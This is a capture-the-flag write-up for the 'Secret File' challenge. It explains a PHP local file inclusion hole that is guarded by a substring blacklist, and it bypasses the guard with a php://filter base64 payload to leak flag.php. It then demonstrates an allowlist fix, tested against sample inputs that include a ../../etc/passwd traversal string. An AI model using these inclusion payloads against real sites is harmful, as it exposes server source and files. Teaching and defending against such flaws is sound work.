# \[极客大挑战 2019]Secret File

## Key points

* File inclusion combined with a PHP stream wrapper (pseudo-protocol) to read files
* http

## Writeup

Capturing the traffic reveals a hidden link, Archive\_room.php. Visiting it reveals another link, action.php, so capture the traffic again.

![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2FAV3Bku54ruiLadjZZFab%2Fimage.png?alt=media\&token=b5bc3f7f-b0f3-4bbe-9b9c-de964303a561)

Visit secr3t.php:

```php
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
    // The flag is in flag.php
?>
```

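Request `secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php`. The `php://filter` wrapper base64-encodes flag.php before `include` processes it, so the source is printed instead of executed; decoding the output gives the flag.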
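
Why the blacklist fails and what a fix looks like, as an added example that is not part of the original challenge code: the check from secr3t.php is reproduced as a function and run over constructed inputs, next to an allowlist lookup. The page names in `ALLOWED_PAGES` and the sample inputs are assumptions.

```php
<?php
// The four substring checks from secr3t.php, reproduced as a function.
function blacklist_allows(string $file): bool {
    return !(strstr($file, "../") || stristr($file, "tp")
        || stristr($file, "input") || stristr($file, "data"));
}

// Hardened alternative (assumption: the application only needs a fixed set
// of includes). User input selects a key; it never becomes part of a path
// or a stream URL, so no wrapper or traversal string can reach include().
const ALLOWED_PAGES = [              // hypothetical page names
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolve_include(string $key): ?string {
    return ALLOWED_PAGES[$key] ?? null;
}

// Constructed sample inputs; the php://filter value is the one from the writeup.
$samples = [
    '../../etc/passwd',
    'http://example.com/x.txt',
    'php://input',
    'data://text/plain,abc',
    'php://filter/convert.base64-encode/resource=flag.php',
    'home',
];

foreach ($samples as $s) {
    printf("%-55s blacklist=%-5s allowlist=%s\n", $s,
        blacklist_allows($s) ? 'pass' : 'block',
        resolve_include($s) ?? 'reject');
}
```

The `php://filter` value contains none of the four blocked substrings, so the blacklist passes it, while the allowlist rejects everything except its own keys.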
